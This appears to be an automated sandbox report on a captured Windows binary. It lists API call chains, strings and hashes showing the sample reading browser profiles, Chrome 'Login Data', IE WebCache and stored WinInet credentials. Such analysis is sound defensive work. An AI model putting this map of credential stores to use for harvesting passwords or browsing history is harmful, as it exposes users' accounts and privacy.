  • Part of subcall function 0040978A: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
  • Part of subcall function 0040978A: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
  • Part of subcall function 0040978A: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
  • Part of subcall function 0040978A: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
  • Part of subcall function 0040978A: _wcsicmp.MSVCRT ref: 004098B7
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
• OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00409A98
• GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00409AB7
• DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00409AC4
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409AD9
  • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
  • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
  • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
  • Part of subcall function 00407D94: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6
• CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00409B03
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00409B18
• WriteFile.KERNELBASE(?,00000000,00000104,0040A0FE,00000000), ref: 00409B33
• UnmapViewOfFile.KERNEL32(00000000), ref: 00409B3A
• FindCloseChangeNotification.KERNELBASE(?), ref: 00409B43
• CloseHandle.KERNEL32(?), ref: 00409B48
• CloseHandle.KERNEL32(00000000), ref: 00409B4D
• CloseHandle.KERNEL32(00000000), ref: 00409B52
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
• API String ID: 327780389-4002013007
• Opcode ID: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
• Instruction ID: fb70aa460989ca239fd235d66d785af6871ae45b3eb53ae5652ba3f6cf74083a
• Opcode Fuzzy Hash: 60cb4c962b787243aa5024f235936815de5306e01eef09160c9394b4f9a47f2d
• Instruction Fuzzy Hash: B9411776900118BBCF119FA5DC499DFBFB9FF09760F108066F604A6252C7749E40DBA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00410D59
• memset.MSVCRT ref: 00410D6E
• memset.MSVCRT ref: 00410D83
• memset.MSVCRT ref: 00410D98
• memset.MSVCRT ref: 00410DAD
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
  • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
  • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
• wcslen.MSVCRT ref: 00410DD3
• wcslen.MSVCRT ref: 00410DE4
• wcslen.MSVCRT ref: 00410E1C
• wcslen.MSVCRT ref: 00410E2A
• wcslen.MSVCRT ref: 00410E63
• wcslen.MSVCRT ref: 00410E71
• memset.MSVCRT ref: 00410EF7
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 2775653040-2068335096
• Opcode ID: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
• Instruction ID: 4a87cbf5aa2277a33565dd90cff8ebe3000d96c1f720339e2901549eb91f8fd8
• Opcode Fuzzy Hash: 16fea6d73d035c85e3aa7dfabd47b58739e07c54c0bc4e606379bbcb509ea4c4
• Instruction Fuzzy Hash: 8451517254121C66DB20E762DD86FCE737C9F85314F1104ABE108E6142EFB99AC4CB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00410F6A
• memset.MSVCRT ref: 00410F7F
• memset.MSVCRT ref: 00410F94
• memset.MSVCRT ref: 00410FA9
• memset.MSVCRT ref: 00410FBE
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
                                                                                                                                                                    • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
                                                                                                                                                                    • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                  • wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00411074
                                                                                                                                                                  • wcslen.MSVCRT ref: 00411082
                                                                                                                                                                  • memset.MSVCRT ref: 00411108
                                                                                                                                                                    • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
                                                                                                                                                                    • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
                                                                                                                                                                  • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                  • API String ID: 2775653040-3369679110
                                                                                                                                                                  • Opcode ID: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                  • Instruction ID: 71a9fb945579d4cb0336c6bc71926503c314de5bf88e5d97c60d5b36565dc427
                                                                                                                                                                  • Opcode Fuzzy Hash: 1044db17df87bea0e64de4cc19f454c88b233916a9b52285606f75aa68ed6d78
                                                                                                                                                                  • Instruction Fuzzy Hash: C3515E729012186ADB20EB51DD86FCF77BD9F85304F1140ABE208E2152EF799BC88B5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                  • API String ID: 2238633743-70141382
                                                                                                                                                                  • Opcode ID: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                  • Instruction ID: f29cbade6603fc4a2ab0b3c2c5315d136f5cdb5c857cdf3d96e229ab99d62a04
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f75a3f3bddc3dec593a73e6e9b000a2c7294f5667c6c424160f1aaab6163010
                                                                                                                                                                  • Instruction Fuzzy Hash: 07F0B774940784ABDB316F759C09E06BEE0EFA8701721491EE1C153A54D779E040CF88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403B29: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
                                                                                                                                                                    • Part of subcall function 00403B29: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
                                                                                                                                                                  • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                  • wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                  • wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                  • memset.MSVCRT ref: 00409679
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                  • _wcsnicmp.MSVCRT ref: 004096DF
                                                                                                                                                                  • wcschr.MSVCRT ref: 00409707
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 0040972B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                  • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                                                                                  • API String ID: 1313344744-1864008983
                                                                                                                                                                  • Opcode ID: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                  • Instruction ID: ea1b4f48df4bf11ab27dc332c663e5edf47b9e63c97f7d7fc3a34612be846c77
                                                                                                                                                                  • Opcode Fuzzy Hash: 8deee998723350620581e2bb250fb40e0760f9a8d38c34826a806f855dbf6811
                                                                                                                                                                  • Instruction Fuzzy Hash: A5511AB1D00209AFDF20DFA5C885AAEB7B8FF08304F14446AE919E7242D738AA45CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2827331108-0
                                                                                                                                                                  • Opcode ID: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                  • Instruction ID: 3deb3861b6046dda02d7dc4087396bab8fe4faf5ffc7b91e65a4640001166331
                                                                                                                                                                  • Opcode Fuzzy Hash: 61a76c3649137508b7a53a801ec47533cdae1a9e4141ff62cc1b1ce7512dd727
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A51C279C00704DFEB30AFA5D8487AE77B4FB86711F20412BF451A7292D7788882CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040A444
                                                                                                                                                                    • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
                                                                                                                                                                    • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A015
                                                                                                                                                                    • Part of subcall function 00409FF2: memset.MSVCRT ref: 0040A02D
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A049
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A058
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A09F
                                                                                                                                                                    • Part of subcall function 00409FF2: wcslen.MSVCRT ref: 0040A0AE
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                  • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040A4D0
                                                                                                                                                                  • wcschr.MSVCRT ref: 0040A4F0
                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040A51F
                                                                                                                                                                  • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A54B
                                                                                                                                                                  • FindCloseUrlCache.WININET(?), ref: 0040A55C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                  • String ID: visited:
                                                                                                                                                                  • API String ID: 615219573-1702587658
                                                                                                                                                                  • Opcode ID: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                  • Instruction ID: a8741c9f70935d188a110af9e9e8f96ccbc1ec5a4ffe9cc29b4dc234b75738c1
                                                                                                                                                                  • Opcode Fuzzy Hash: 58ee3583334abb47630858a22ac836657d2b8b3eef5533a356816c3e949a7c62
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F419F72900219BBDB10EFA5DC85AAEBBB8FF44754F10406AE504F3281DB789E51CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
                                                                                                                                                                  • memset.MSVCRT ref: 00409BC2
                                                                                                                                                                    • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
                                                                                                                                                                  • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,76D7F560), ref: 00409C90
                                                                                                                                                                    • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
                                                                                                                                                                    • Part of subcall function 00408FFD: wcslen.MSVCRT ref: 0040900C
                                                                                                                                                                    • Part of subcall function 00408FFD: _memicmp.MSVCRT ref: 0040903A
• _snwprintf.MSVCRT ref: 00409C5C
  • Part of subcall function 00408DC5: wcslen.MSVCRT ref: 00408DD7
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
  • Part of subcall function 00408DC5: free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
  • Part of subcall function 00408DC5: memcpy.MSVCRT ref: 00408E44
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
• Opcode ID: 9da10080cfd8ad73592542fad7b503c35a13a598c4bcd5ee74f32142ceaa2db5
• Instruction ID: b0f72644bbd87b50ea7a8f8ee73cfa3b4c243fbe701b8101a2a2b04dab44341a
• Opcode Fuzzy Hash: 9da10080cfd8ad73592542fad7b503c35a13a598c4bcd5ee74f32142ceaa2db5
• Instruction Fuzzy Hash: 29319471D042196AEF50EFA5CC45ADEB7F8AF44344F11007BA519B3182DB38AE448B98
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408D9F: free.MSVCRT(?,00409176,00000000,?,00000000), ref: 00408DA2
  • Part of subcall function 00408D9F: free.MSVCRT(?,?,00409176,00000000,?,00000000), ref: 00408DAA
  • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
  • Part of subcall function 0040A420: memset.MSVCRT ref: 0040A444
  • Part of subcall function 0040A420: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040A4B9
  • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4D0
  • Part of subcall function 0040A420: wcschr.MSVCRT ref: 0040A4F0
  • Part of subcall function 0040A420: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040A515
  • Part of subcall function 0040A420: GetLastError.KERNEL32 ref: 0040A51F
  • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A5DF
  • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A60D
  • Part of subcall function 0040A56F: _wcsupr.MSVCRT ref: 0040A627
  • Part of subcall function 0040A56F: memset.MSVCRT ref: 0040A676
  • Part of subcall function 0040A56F: RegEnumValueW.ADVAPI32 ref: 0040A6A1
  • Part of subcall function 00403C2A: LoadLibraryW.KERNEL32(advapi32.dll,?,0040A9C2,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,00411E75,?,?), ref: 00403C35
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00403C49
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00403C55
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00403C61
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403C6D
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403C79
  • Part of subcall function 00403C2A: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00403C85
• _wcslwr.MSVCRT ref: 0040AA14
• wcslen.MSVCRT ref: 0040AA29
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 4091582287-4196376884
• Opcode ID: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
• Instruction ID: e8c4dab73010a582bcb55339b064a6b15101daee4fa053d2547f161988c3f8ed
• Opcode Fuzzy Hash: a2e55a5f7a2abe8bdf86ac4545e9fd2e58219daa9b5178b84a3e4fad2c2eba33
• Instruction Fuzzy Hash: C731D272700204AADB20BB6ACD41A9F7669EF80344F25087FB844FB1C6DB78DD91D699
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040A015
• memset.MSVCRT ref: 0040A02D
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
• wcslen.MSVCRT ref: 0040A049
• wcslen.MSVCRT ref: 0040A058
• wcslen.MSVCRT ref: 0040A09F
• wcslen.MSVCRT ref: 0040A0AE
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2036768262-2114579845
• Opcode ID: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
• Instruction ID: e8ec88334da27b7df1bd19bf5f92620076e348809ddf91dc3f5a530f518c7d73
• Opcode Fuzzy Hash: 4f3e9085c2dbcc7e6162e8bbb838ae9c3514795d1e5f680df132b17e4eba2700
• Instruction Fuzzy Hash: F121A9B254021C55DB20E691DC85EDB73BCAF54314F5104BFF615E2081EBB8DA84465D
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
• Opcode ID: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
• Instruction ID: 2a909f6aa8b78d8aa74dd045bbec2887fe81728cdb5ed6237a850f532ee9234f
• Opcode Fuzzy Hash: 53a30cc7d252268d97bb4665958255b11a08b07c7cd133945acccca950d5993c
• Instruction Fuzzy Hash: 5A711CB1600201BFF310AF1ADC82B5AB798BB44719F15452FF45897782C7BDE9908B99
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CA3
  • Part of subcall function 00410C87: memset.MSVCRT ref: 00410CB8
  • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410CE1
  • Part of subcall function 00410C87: wcscat.MSVCRT ref: 00410D0A
• memset.MSVCRT ref: 00410A9A
• wcslen.MSVCRT ref: 00410AB1
• wcslen.MSVCRT ref: 00410AB9
• wcslen.MSVCRT ref: 00410B14
• wcslen.MSVCRT ref: 00410B22
  • Part of subcall function 004083D6: wcscpy.MSVCRT ref: 004083DE
  • Part of subcall function 004083D6: wcscat.MSVCRT ref: 004083ED
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcslen$memsetwcscat$wcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2541527827-467022611
• Opcode ID: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
• Instruction ID: 16c00ee82f17989474e920b03892a6de4e18c3fe0141c7e4295d5dc86641310b
• Opcode Fuzzy Hash: 25ea34a281439d809f371ac1cf7c0884433c21bdeb59f3c4b6e0df9e4197b33a
• Instruction Fuzzy Hash: 17314571D041189ADF10EBA5DC89ACDB3B8AF50319F20457FE554F2182EB7C9A84CB58
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcslen$memsetwcscatwcscpy
• String ID: Login Data$Web Data
• API String ID: 3932597654-4228647177
• Opcode ID: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
• Instruction ID: 9a91d2e82c236d30763d7b9ebcc1a6cccb69c4478b10b945406aecd22e6d63c1
• Opcode Fuzzy Hash: 7231a64d0824cf94e0c730f6189b32a897f20d3e441a0ecaf3f9be98e6314f32
• Instruction Fuzzy Hash: 46218B7250411C6ADB10EB55EC89FDA73ACAF50328F14487FF518E3191EBBCDAC44658
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(?,-7FBE8982,00000003,00000000,?,?,00000000), ref: 00417D72
• CreateFileA.KERNEL32(?,-7FBE8982,00000003,00000000,004175FE,004175FE,00000000), ref: 00417D8A
• GetLastError.KERNEL32 ref: 00417D99
• free.MSVCRT(?), ref: 00417DA6
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateFile$ErrorLastfree
• String ID:
• API String ID: 77810686-0
• Opcode ID: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
• Instruction ID: 35fec4397722218e6507e77f53b50855b574b2e4c8baf302a97b237cc2aa3bd3
• Opcode Fuzzy Hash: a26124fb8da27f2cbfd9df83ebe6b72667bba8263af52734d4187cb9e803d476
• Instruction Fuzzy Hash: D841F27150C3059FEB20CF25EC4179BBBF4EF84314F10892EF89592291D738DA848B96
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??2@$DeleteHandleIconLoadModuleObjectmemset
• String ID:
• API String ID: 3532479477-0
• Opcode ID: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
• Instruction ID: 6b7a5e441d588d9bc54ea64e01ff161f986e35cd5d296fb942180f783725d529
• Opcode Fuzzy Hash: 14c3c2aa7062e08bf63dc7d5d281a39e77aead53937f861c87ecd8ed2eee7028
• Instruction Fuzzy Hash: EA315EB19013888FDB30EF668C896CAB6E9BF45314F00863FE84DDB641DBB946448B59
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00410CA3
• memset.MSVCRT ref: 00410CB8
  • Part of subcall function 00414558: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
  • Part of subcall function 00407DD1: wcslen.MSVCRT ref: 00407DD2
  • Part of subcall function 00407DD1: wcscat.MSVCRT ref: 00407DEA
• wcscat.MSVCRT ref: 00410CE1
  • Part of subcall function 00414558: memset.MSVCRT ref: 004145B1
  • Part of subcall function 00414558: RegCloseKey.ADVAPI32(?), ref: 00414618
  • Part of subcall function 00414558: wcscpy.MSVCRT ref: 00414626
• wcscat.MSVCRT ref: 00410D0A
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 1534475566-1174173950
• Opcode ID: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
• Instruction ID: 1b820a25e8b0a88a2df896ef0368420f7b9c24777a221978b2b2a3cd549cec0e
• Opcode Fuzzy Hash: 86b2fee5573bc67bc9087b08d08cdc2ad0ccfef1d6009a232684216d2b924b41
• Instruction Fuzzy Hash: 860152B294031C76EB20AB668C86EDB762C9F85358F0141AAB618B7142D97C9DC44AAD
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
  • Part of subcall function 00411E4C: memset.MSVCRT ref: 00411EC2
  • Part of subcall function 00411E4C: wcsrchr.MSVCRT ref: 00411EDB
  • Part of subcall function 00411BB2: SetCurrentDirectoryW.KERNEL32(?,?,?,00403557,?), ref: 00411BFF
• memset.MSVCRT ref: 004035BC
• memcpy.MSVCRT ref: 004035D0
• wcscmp.MSVCRT ref: 004035F8
• _wcsicmp.MSVCRT ref: 0040362F
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memset$CurrentDirectory_wcsicmpfreememcpywcscmpwcsrchr
• String ID:
• API String ID: 1763786148-3916222277
• Opcode ID: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
• Instruction ID: bd143a35ad5b1b32f57d6bfe9876d60f7f1e4d0a05a181755c1d953110edcb1c
• Opcode Fuzzy Hash: 09aee775218a621ff1fef0c9153cb1cfdc5fccf2e7c31d726b2849875dfa8a1e
• Instruction Fuzzy Hash: 24412A71D40229AADF20EFA5CC45ADEB7B8AF44318F1044ABE508B3241DB789B858F59
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004144AB: LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
  • Part of subcall function 004144AB: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
• SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 00414592
• memset.MSVCRT ref: 004145B1
• RegCloseKey.ADVAPI32(?), ref: 00414618
• wcscpy.MSVCRT ref: 00414626
  • Part of subcall function 004083A1: GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
Strings
